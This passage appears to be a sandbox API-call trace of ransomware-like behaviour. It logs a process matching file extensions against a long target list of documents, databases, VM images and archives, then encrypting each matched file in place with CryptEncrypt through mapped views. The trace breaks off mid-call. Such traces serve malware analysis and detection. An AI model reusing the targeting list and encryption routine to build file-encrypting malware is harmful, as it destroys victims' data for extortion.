(lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.242] PathFindExtensionW (pszPath="Notes_loop_PAL.wmv") returned=".wmv" [0040.242] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.242] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.242] PathFindExtensionW (pszPath="ParentMenuButtonIcon.png") returned=".png" [0040.242] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.243] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.243] PathFindExtensionW (pszPath="ParentMenuButtonIconSubpict.png") returned=".png" [0040.243] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.243] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.243] PathFindExtensionW (pszPath="performance.png") returned=".png" [0040.243] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.243] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.243] PathFindExtensionW (pszPath="Perf_Scenes_Mask1.png") returned=".png" [0040.243] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.243] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.243] PathFindExtensionW (pszPath="Perf_Scenes_Subpicture1.png") returned=".png" [0040.243] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.243] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.244] PathFindExtensionW (pszPath="PreviousMenuButtonIcon.png") returned=".png" [0040.244] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.244] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.244] PathFindExtensionW (pszPath="PreviousMenuButtonIconSubpi.png") returned=".png" [0040.244] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.244] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.244] PathFindExtensionW (pszPath="redmenu.png") returned=".png" [0040.244] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.244] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.244] PathFindExtensionW (pszPath="Scene_loop.wmv") returned=".wmv" [0040.244] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.244] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.244] PathFindExtensionW (pszPath="Scene_loop_PAL.wmv") returned=".wmv" [0040.244] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".wmv.") returned 5 [0040.244] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".wmv.") returned 0x0 [0040.245] PathFindExtensionW (pszPath="TitleButtonIcon.png") returned=".png" [0040.245] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.245] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.245] PathFindExtensionW (pszPath="TitleButtonSubpicture.png") returned=".png" [0040.245] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.245] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.245] PathFindExtensionW (pszPath="Title_Page.wmv") returned=".wmv" [0040.581] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4de70*=0x3c7, dwBufLen=0x3d0 | out: pbData=0x190000*, pdwDataLen=0x2e4de70*=0x3d0) returned 1 [0040.584] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0x3d0) returned 1 [0040.587] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0040.587] CloseHandle (hObject=0x204) returned 1 [0040.587] CloseHandle (hObject=0x200) returned 1 [0040.914] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4bc30*=0x2fa9, dwBufLen=0x2fb0 | out: pbData=0x190000*, pdwDataLen=0x2e4bc30*=0x2fb0) returned 1 [0040.915] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0x2fb0) returned 1 [0040.919] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0040.920] CloseHandle (hObject=0x24c) returned 1 [0040.920] CloseHandle (hObject=0x248) returned 1 [0041.022] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4bc30*=0x2fa9, dwBufLen=0x2fb0 | out: pbData=0x190000*, pdwDataLen=0x2e4bc30*=0x2fb0) returned 1 [0041.023] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0x2fb0) returned 1 [0041.024] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.025] CloseHandle (hObject=0x24c) returned 1 [0041.025] CloseHandle (hObject=0x248) returned 1 [0041.122] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4c4c0*=0x2443, dwBufLen=0x2450 | out: pbData=0x190000*, pdwDataLen=0x2e4c4c0*=0x2450) returned 1 [0041.122] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0x2450) returned 1 [0041.124] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.125] CloseHandle (hObject=0x248) returned 1 [0041.125] CloseHandle (hObject=0x244) returned 1 [0041.126] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4c4c0*=0x475b, dwBufLen=0x4760 | out: pbData=0x190000*, pdwDataLen=0x2e4c4c0*=0x4760) returned 1 [0041.126] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0x4760) returned 1 [0041.128] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.128] CloseHandle (hObject=0x248) returned 1 [0041.128] CloseHandle (hObject=0x244) returned 1 [0041.134] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4cd50*=0x9795, dwBufLen=0x97a0 | out: pbData=0x190000*, pdwDataLen=0x2e4cd50*=0x97a0) returned 1 [0041.135] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0x97a0) returned 1 [0041.137] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.137] CloseHandle (hObject=0x244) returned 1 [0041.137] CloseHandle (hObject=0x240) returned 1 [0041.139] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4cd50*=0xcb9e, dwBufLen=0xcba0 | out: pbData=0x190000*, pdwDataLen=0x2e4cd50*=0xcba0) returned 1 [0041.140] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0xcba0) returned 1 [0041.143] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.143] CloseHandle (hObject=0x244) returned 1 [0041.144] CloseHandle (hObject=0x240) returned 1 [0041.144] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4cd50*=0xfb3c, dwBufLen=0xfb40 | out: pbData=0x190000*, pdwDataLen=0x2e4cd50*=0xfb40) returned 1 [0041.146] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0xfb40) returned 1 [0041.149] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.150] CloseHandle (hObject=0x244) returned 1 [0041.150] CloseHandle (hObject=0x240) returned 1 [0041.223] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4cd50*=0xb253, dwBufLen=0xb260 | out: pbData=0x190000*, pdwDataLen=0x2e4cd50*=0xb260) returned 1 [0041.225] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0xb260) returned 1 [0041.228] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.228] CloseHandle (hObject=0x244) returned 1 [0041.228] CloseHandle (hObject=0x240) returned 1 [0041.232] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4c4c0*=0x9d2b, dwBufLen=0x9d30 | out: pbData=0x190000*, pdwDataLen=0x2e4c4c0*=0x9d30) returned 1 [0041.233] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0x9d30) returned 1 [0041.249] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.250] CloseHandle (hObject=0x248) returned 1 [0041.250] CloseHandle (hObject=0x244) returned 1 [0041.251] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4cd50*=0xff63, dwBufLen=0xff70 | out: pbData=0x190000*, pdwDataLen=0x2e4cd50*=0xff70) returned 1 [0041.252] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0xff70) returned 1 [0041.259] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.260] CloseHandle (hObject=0x244) returned 1 [0041.260] CloseHandle (hObject=0x240) returned 1 [0041.263] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4cd50*=0x955d, dwBufLen=0x9560 | out: pbData=0x190000*, pdwDataLen=0x2e4cd50*=0x9560) returned 1 [0041.264] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0x9560) returned 1 [0041.267] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.268] CloseHandle (hObject=0x244) returned 1 [0041.268] CloseHandle (hObject=0x240) returned 1 [0041.271] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2b0000, pdwDataLen=0x2e4d5e0*=0x1467c, dwBufLen=0x14680 | out: pbData=0x2b0000*, pdwDataLen=0x2e4d5e0*=0x14680) returned 1 [0041.273] FlushViewOfFile (lpBaseAddress=0x2b0000, dwNumberOfBytesToFlush=0x14680) returned 1 [0041.278] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0041.279] CloseHandle (hObject=0x240) returned 1 [0041.279] CloseHandle (hObject=0x204) returned 1 [0041.280] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2b0000, pdwDataLen=0x2e4d5e0*=0x14564, dwBufLen=0x14570 | out: pbData=0x2b0000*, pdwDataLen=0x2e4d5e0*=0x14570) returned 1 [0041.282] FlushViewOfFile (lpBaseAddress=0x2b0000, dwNumberOfBytesToFlush=0x14570) returned 1 [0041.286] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0041.287] CloseHandle (hObject=0x240) returned 1 [0041.287] CloseHandle (hObject=0x204) returned 1 [0041.288] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2b0000, pdwDataLen=0x2e4d5e0*=0x17631, dwBufLen=0x17640 | out: pbData=0x2b0000*, pdwDataLen=0x2e4d5e0*=0x17640) returned 1 [0041.291] FlushViewOfFile (lpBaseAddress=0x2b0000, dwNumberOfBytesToFlush=0x17640) returned 1 [0041.293] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0041.295] CloseHandle (hObject=0x240) returned 1 [0041.295] CloseHandle (hObject=0x204) returned 1 [0041.296] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4d5e0*=0xbd17, dwBufLen=0xbd20 | out: pbData=0x190000*, pdwDataLen=0x2e4d5e0*=0xbd20) returned 1 [0041.298] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0xbd20) returned 1 [0041.304] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.304] CloseHandle (hObject=0x240) returned 1 [0041.304] CloseHandle (hObject=0x204) returned 1 [0041.305] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4d5e0*=0xecc6, dwBufLen=0xecd0 | out: pbData=0x190000*, pdwDataLen=0x2e4d5e0*=0xecd0) returned 1 [0041.307] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0xecd0) returned 1 [0041.327] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.327] CloseHandle (hObject=0x240) returned 1 [0041.327] CloseHandle (hObject=0x204) returned 1 [0041.328] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4d5e0*=0xf9fe, dwBufLen=0xfa00 | out: pbData=0x190000*, pdwDataLen=0x2e4d5e0*=0xfa00) returned 1 [0041.329] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0xfa00) returned 1 [0041.331] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.331] CloseHandle (hObject=0x240) returned 1 [0041.331] CloseHandle (hObject=0x204) returned 1 [0041.332] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4cd50*=0x3d3e, dwBufLen=0x3d40 | out: pbData=0x190000*, pdwDataLen=0x2e4cd50*=0x3d40) returned 1 [0041.333] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0x3d40) returned 1 [0041.335] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.336] CloseHandle (hObject=0x244) returned 1 [0041.336] CloseHandle (hObject=0x240) returned 1 [0041.337] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4cd50*=0xe2e, dwBufLen=0xe30 | out: pbData=0x190000*, pdwDataLen=0x2e4cd50*=0xe30) returned 1 [0041.337] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0xe30) returned 1 [0041.339] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.340] CloseHandle (hObject=0x244) returned 1 [0041.340] CloseHandle (hObject=0x240) returned 1 [0041.341] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2b0000, pdwDataLen=0x2e4d5e0*=0x13b13, dwBufLen=0x13b20 | out: pbData=0x2b0000*, pdwDataLen=0x2e4d5e0*=0x13b20) returned 1 [0041.344] FlushViewOfFile (lpBaseAddress=0x2b0000, dwNumberOfBytesToFlush=0x13b20) returned 1 [0041.349] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0041.350] CloseHandle (hObject=0x240) returned 1 [0041.350] CloseHandle (hObject=0x204) returned 1 [0041.351] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4d5e0*=0xbfea, dwBufLen=0xbff0 | out: pbData=0x190000*, pdwDataLen=0x2e4d5e0*=0xbff0) returned 1 [0041.352] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0xbff0) returned 1 [0041.354] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.354] CloseHandle (hObject=0x240) returned 1 [0041.354] CloseHandle (hObject=0x204) returned 1 [0041.355] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2b0000, pdwDataLen=0x2e4d5e0*=0x1588f, dwBufLen=0x15890 | out: pbData=0x2b0000*, pdwDataLen=0x2e4d5e0*=0x15890) returned 1 [0041.356] FlushViewOfFile (lpBaseAddress=0x2b0000, dwNumberOfBytesToFlush=0x15890) returned 1 [0041.359] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0041.360] CloseHandle (hObject=0x240) returned 1 [0041.360] CloseHandle (hObject=0x204) returned 1 [0041.360] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2b0000, pdwDataLen=0x2e4d5e0*=0x160f4, dwBufLen=0x16100 | out: pbData=0x2b0000*, pdwDataLen=0x2e4d5e0*=0x16100) returned 1 [0041.363] FlushViewOfFile (lpBaseAddress=0x2b0000, dwNumberOfBytesToFlush=0x16100) returned 1 [0041.369] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0041.370] CloseHandle (hObject=0x240) returned 1 [0041.370] CloseHandle (hObject=0x204) returned 1 [0041.371] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4cd50*=0xac33, dwBufLen=0xac40 | out: pbData=0x190000*, pdwDataLen=0x2e4cd50*=0xac40) returned 1 [0041.372] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0xac40) returned 1 [0041.375] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.376] CloseHandle (hObject=0x244) returned 1 [0041.376] CloseHandle (hObject=0x240) returned 1 [0041.376] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4cd50*=0xbfe0, dwBufLen=0xbff0 | out: pbData=0x190000*, pdwDataLen=0x2e4cd50*=0xbff0) returned 1 [0041.378] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0xbff0) returned 1 [0041.390] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.390] CloseHandle (hObject=0x244) returned 1 [0041.391] CloseHandle (hObject=0x240) returned 1 [0041.391] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2b0000, pdwDataLen=0x2e4cd50*=0x138b4, dwBufLen=0x138c0 | out: pbData=0x2b0000*, pdwDataLen=0x2e4cd50*=0x138c0) returned 1 [0041.393] FlushViewOfFile (lpBaseAddress=0x2b0000, dwNumberOfBytesToFlush=0x138c0) returned 1 [0041.400] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0041.401] CloseHandle (hObject=0x244) returned 1 [0041.401] CloseHandle (hObject=0x240) returned 1 [0041.402] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4cd50*=0xe21b, dwBufLen=0xe220 | out: pbData=0x190000*, pdwDataLen=0x2e4cd50*=0xe220) returned 1 [0041.403] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0xe220) returned 1 [0041.406] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.407] CloseHandle (hObject=0x244) returned 1 [0041.407] CloseHandle (hObject=0x240) returned 1 [0041.408] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4cd50*=0x7865, dwBufLen=0x7870 | out: pbData=0x190000*, pdwDataLen=0x2e4cd50*=0x7870) returned 1 [0041.409] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0x7870) returned 1 [0041.411] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.412] CloseHandle (hObject=0x244) returned 1 [0041.412] CloseHandle (hObject=0x240) returned 1 [0041.412] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2b0000, pdwDataLen=0x2e4cd50*=0x1834a, dwBufLen=0x18350 | out: pbData=0x2b0000*, pdwDataLen=0x2e4cd50*=0x18350) returned 1 [0041.414] FlushViewOfFile (lpBaseAddress=0x2b0000, dwNumberOfBytesToFlush=0x18350) returned 1 [0041.416] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0041.417] CloseHandle (hObject=0x244) returned 1 [0041.417] CloseHandle (hObject=0x240) returned 1 [0041.418] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2b0000, pdwDataLen=0x2e4cd50*=0x152a8, dwBufLen=0x152b0 | out: pbData=0x2b0000*, pdwDataLen=0x2e4cd50*=0x152b0) returned 1 [0041.420] FlushViewOfFile (lpBaseAddress=0x2b0000, dwNumberOfBytesToFlush=0x152b0) returned 1 [0041.422] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0041.423] CloseHandle (hObject=0x244) returned 1 [0041.423] CloseHandle (hObject=0x240) returned 1 [0041.424] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4d5e0*=0x90ab, dwBufLen=0x90b0 | out: pbData=0x190000*, pdwDataLen=0x2e4d5e0*=0x90b0) returned 1 [0041.426] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0x90b0) returned 1 [0041.430] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.431] CloseHandle (hObject=0x240) returned 1 [0041.431] CloseHandle (hObject=0x204) returned 1 [0041.431] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4d5e0*=0xab6b, dwBufLen=0xab70 | out: pbData=0x190000*, pdwDataLen=0x2e4d5e0*=0xab70) returned 1 [0041.432] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0xab70) returned 1 [0041.434] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.435] CloseHandle (hObject=0x240) returned 1 [0041.435] CloseHandle (hObject=0x204) returned 1 [0041.436] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4d5e0*=0x3d73, dwBufLen=0x3d80 | out: pbData=0x190000*, pdwDataLen=0x2e4d5e0*=0x3d80) returned 1 [0041.436] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0x3d80) returned 1 [0041.437] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.438] CloseHandle (hObject=0x240) returned 1 [0041.438] CloseHandle (hObject=0x204) returned 1 [0041.438] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2b0000, pdwDataLen=0x2e4d5e0*=0x12000, dwBufLen=0x12010 | out: pbData=0x2b0000, pdwDataLen=0x2e4d5e0) returned 0 [0041.439] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0041.439] CloseHandle (hObject=0x240) returned 1 [0041.439] CloseHandle (hObject=0x204) returned 1 [0041.440] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4cd50*=0x9510, 